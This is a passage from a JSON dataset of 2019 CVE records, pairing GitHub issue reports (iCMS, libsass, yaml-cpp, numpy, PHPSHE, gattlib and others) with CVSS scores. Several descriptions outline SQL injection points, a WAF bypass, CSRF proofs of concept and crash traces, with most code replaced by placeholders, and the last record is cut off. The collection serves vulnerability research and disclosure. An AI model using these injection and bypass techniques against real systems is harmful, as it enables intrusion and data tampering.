        "CVE_ID": "CVE-2019-6259",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/47",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/47",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-01-10T08:16:20Z",
        "description": "iCMS NUMBERTAG Has A SQLi vulnerability in FILETAG . The vulnerability is in background APITAG In line NUMBERTAG in this code ,we can contol APITAG if($_POST['_data_id']){ $_data_id = APITAG $_data_id = json_decode($_data_id,true); $_count = count($_data_id); } We can post data and due to APITAG ,we alse can post a ' successfully. In line NUMBERTAG if(is_array($_data_id)){ $dkey = array_search($adid, $_data_id); if($dkey!==false && $_chapter){//\u64a4\u6d88\u7ae0\u8282\u65f6 unset($_data_id[$dkey]); //\u5220\u9664\u7ae0\u8282 if($_data_id)foreach ($_data_id as $_id) { $_id && article::del_data($_id,'id'); } } } If APITAG is a arary , APITAG , APITAG has a value that we can send APITAG to APITAG In FILETAG public static function del_data($id,$f='aid'){ iDB::query(\"DELETE FROM APITAG WHERE APITAG ='$id'\"); } And the ERRORTAG used in ERRORTAG in line NUMBERTAG APITAG we can find that APITAG ,we don't know the APITAG ,but we can post a many data to bypass this ,like APITAG And the APITAG , APITAG ,we can send chapter NUMBERTAG to bypass. so that the final payload is CODETAG And another very very very very very import problem is that in FILETAG , APITAG but in APITAG use APITAG ,but this place use APITAG of course return ture ,that mean this WAF in background is no any use!!!!!!!!!!!!so that I can use sleep NUMBERTAG and continue injecting. author by leo. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6284",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2816",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2816",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-01-14T06:46:57Z",
        "description": "APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ). A heap buffer overflow in APITAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG ef bp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG ee in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in APITAG const ) PATHTAG NUMBERTAG ce2 in char const APITAG const ) PATHTAG NUMBERTAG ce2 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG d NUMBERTAG e in APITAG PATHTAG NUMBERTAG bc1b in APITAG PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b3e in APITAG PATHTAG NUMBERTAG d9b in APITAG PATHTAG NUMBERTAG fa3d2 in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG f8c3b in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Shadow bytes around the buggy address NUMBERTAG c0e7fff7fb NUMBERTAG c0e7fff7fc NUMBERTAG c0e7fff7fd NUMBERTAG c0e7fff7fe NUMBERTAG c0e7fff7ff NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6285",
        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/660",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/660",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2019-01-14T07:58:28Z",
        "description": "Stack Overflow in APITAG (). Stack Overflow in APITAG () position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG bf6a8fc0 (pc NUMBERTAG e3e3 bp NUMBERTAG bf6a NUMBERTAG e8 sp NUMBERTAG bf6a8fb0 T NUMBERTAG e3e2 ( PATHTAG NUMBERTAG fde8 ( PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG b8 ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6286",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2815",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2815",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-01-14T06:39:46Z",
        "description": "APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ). A heap buffer overflow in APITAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: APITAG \u3001 APITAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ba at pc NUMBERTAG bp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG sp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ba thread T NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ba is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6293",
        "Issue_Url_old": "https://github.com/westes/flex/issues/414",
        "Issue_Url_new": "https://github.com/westes/flex/issues/414",
        "Repo_new": "westes/flex",
        "Issue_Created_At": "2019-01-09T07:06:10Z",
        "description": "Stack Comsumption Problem Caused By the mark_beginning_as_normal Function Making Recursive Calls to Itself. Hi there, An issue was discovered in function mark_beginning_as_normal in nfa.c, as distributed in fle NUMBERTAG There is a stack exhaustion problem caused by the in mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of ' ' characters. Here is the POC file. Please use the \u201c./flex $POC\u201d to reproduce the bug. APITAG $POC\u201d The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-6294",
        "Issue_Url_old": "https://github.com/TeamEasy/EasyCMS/issues/8",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/8",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2019-01-15T09:48:11Z",
        "description": "There is one CSRF vulnerability that can add the user account . After the administrator logged in, open the following page poc\uff1a APITAG add a user ''' APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG '''",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6295",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/12",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/12",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2019-01-15T08:21:23Z",
        "description": "1. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6446",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/12759",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/12759",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2019-01-16T02:36:51Z",
        "description": "numpy load function with evil data will cause command execution. numpy load function with evil data will cause command execution,if attack share evil data on internet, when user load it , it will cause command execution. Reproducing code example: CODETAG APITAG version information NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6486",
        "Issue_Url_old": "https://github.com/golang/go/issues/29903",
        "Issue_Url_new": "https://github.com/golang/go/issues/29903",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-01-23T21:47:29Z",
        "description": "crypto/elliptic: CPU APITAG vulnerability affecting P NUMBERTAG and P NUMBERTAG A APITAG vulnerability in the crypto/elliptic implementations of the P NUMBERTAG and P NUMBERTAG elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU. These inputs might be delivered via TLS handshakes NUMBERTAG certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH private key is reused more than once, the attack can also lead to key recovery. This issue is CVETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6497",
        "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/1",
        "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/1",
        "Repo_new": "fantasticlbp/hotels_server",
        "Issue_Created_At": "2019-01-19T15:20:53Z",
        "description": "SQL Injection Vulnerability in FILETAG . In FILETAG FILETAG the parameter was added with a string \"username=\" ,passed to function find In the definition of function find,we can notice that though the author use PDO, he didn't use Prepared technique to avoid SQL injection vulnerability. What a pity! FILETAG After analyzing these codes,we can simply use sqlmap to exploit the vulnerability and have fun! FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6498",
        "Issue_Url_old": "https://github.com/labapart/gattlib/issues/82",
        "Issue_Url_new": "https://github.com/labapart/gattlib/issues/82",
        "Repo_new": "labapart/gattlib",
        "Issue_Created_At": "2019-01-20T07:45:43Z",
        "description": "stack based bufferoverflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN and a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from notification.c CODETAG Also, I have figured a simple way to reproduce this rather than using AFL poc in this case. APITAG ERRORTAG notification` in this case.",
        "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6498",
        "Issue_Url_old": "https://github.com/labapart/gattlib/issues/81",
        "Issue_Url_new": "https://github.com/labapart/gattlib/issues/81",
        "Repo_new": "labapart/gattlib",
        "Issue_Created_At": "2019-01-20T07:33:47Z",
        "description": "stack based bufferoverflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN and a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from discover.c CODETAG Also, I have figured a simple way to reproduce this rather than using AFL poc in this case. APITAG ASAN ERRORTAG I have also written a quick MSF module for this specifically the APITAG part CODETAG In addition memory leak was also observed in this case. ERRORTAG OR to verify, APITAG Request team to have a look and validate.",
        "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6502",
        "Issue_Url_old": "https://github.com/OpenSC/OpenSC/issues/1586",
        "Issue_Url_new": "https://github.com/opensc/opensc/issues/1586",
        "Repo_new": "opensc/opensc",
        "Issue_Created_At": "2019-01-20T17:08:17Z",
        "description": "Memory leak. Hi Team, I have build this repo using clang via ASAN, a memory leak was detected in APITAG ASAN ERRORTAG eidenv.c ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6503",
        "Issue_Url_old": "https://github.com/chatopera/cosin/issues/177",
        "Issue_Url_new": "https://github.com/cskefu/cskefu/issues/177",
        "Repo_new": "cskefu/cskefu",
        "Issue_Created_At": "2019-01-22T03:49:20Z",
        "description": "\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e. \u63cf\u8ff0 APITAG \u73b0\u5728\u884c\u4e3a APITAG FILETAG \u8ddf\u8fdb\u8be5\u65b9\u6cd5\u4e2d\uff0c\u53d1\u73b0\u76f4\u63a5\u5bf9\u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c FILETAG \u9884\u671f\u884c\u4e3a \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4e0a\u4f20\u6076\u610f\u6784\u9020\u7684\u6587\u4ef6\uff0c\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002 \u89e3\u51b3\u65b9\u6848 \u767d\u540d\u5355 \u73af\u5883 \u4ee3\u7801\u7248\u672c: Git commit hash ( APITAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6507",
        "Issue_Url_old": "https://github.com/creditease-sec/insight/issues/42",
        "Issue_Url_new": "https://github.com/creditease-sec/insight/issues/42",
        "Repo_new": "creditease-sec/insight",
        "Issue_Created_At": "2019-01-22T13:59:31Z",
        "description": "There are four CSRF vulnerability that can delete user and etc. vulnerability file: FILETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG CODETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG ERRORTAG poc NUMBERTAG Post one drops or comment contains this APITAG NUMBERTAG Wait admin to login and access the APITAG admin query the img , one user will be deleted.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6707",
        "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/1",
        "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/1",
        "Repo_new": "kk98kk0/exploit",
        "Issue_Created_At": "2019-01-03T12:49:43Z",
        "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability. APITAG describes Detection object NUMBERTAG website name: PHPSHE CMS system NUMBERTAG website domain name: FILETAG NUMBERTAG the IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG Description of vulnerability: Lingbao APITAG network technology co., LTD. PHPSHE CMS system SQL injection vulnerability NUMBERTAG POC and verification Local construction environment NUMBERTAG download PHPSHE NUMBERTAG mall system at FILETAG NUMBERTAG the background to FILETAG the user/password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: CODETAG vulnerability verification: APITAG NUMBERTAG TXT file contents: CODETAG FILETAG current user: 'root APITAG Code audit: Setup the environment locally. APITAG Line NUMBERTAG of FILETAG enters the FILETAG logic after the submission. FILETAG NUMBERTAG Pe_update function updates the database product=product APITAG FILETAG NUMBERTAG Pe_update function calls _dowhere to process conditional statements. FILETAG NUMBERTAG dowhere function Sql splicing. FILETAG NUMBERTAG When sqlwhere statement is returned after splicing, please note that the malicious code has been spliced successfully FILETAG NUMBERTAG Finally, the database was updated successfully FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-6708",
        "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/2",
        "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/2",
        "Repo_new": "kk98kk0/exploit",
        "Issue_Created_At": "2019-01-06T12:51:46Z",
        "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG ulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability. POC and validation Local setup environment NUMBERTAG download PHPSHE NUMBERTAG cms system at FILETAG NUMBERTAG the background to FILETAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: ERRORTAG Vulnerability verification method: APITAG NUMBERTAG TXT file contents: CODETAG Vulnerability identification FILETAG FILETAG The solution Background avoid parameter splicing. Code audit: Local environment. FILETAG APITAG The FILETAG line NUMBERTAG execution flow introduces the FILETAG line NUMBERTAG pe_selectall function to count the order list. FILETAG The pe_selectall function is defined on line NUMBERTAG of FILETAG . FILETAG The Pe_selectall function handles conditional statements through the _dowhere APITAG sql_selectall function displays the number of transactions per APITAG malicious SQL is spliced in the _dowhere APITAG injection successful. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-6719",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/111",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/111",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-01-15T11:05:33Z",
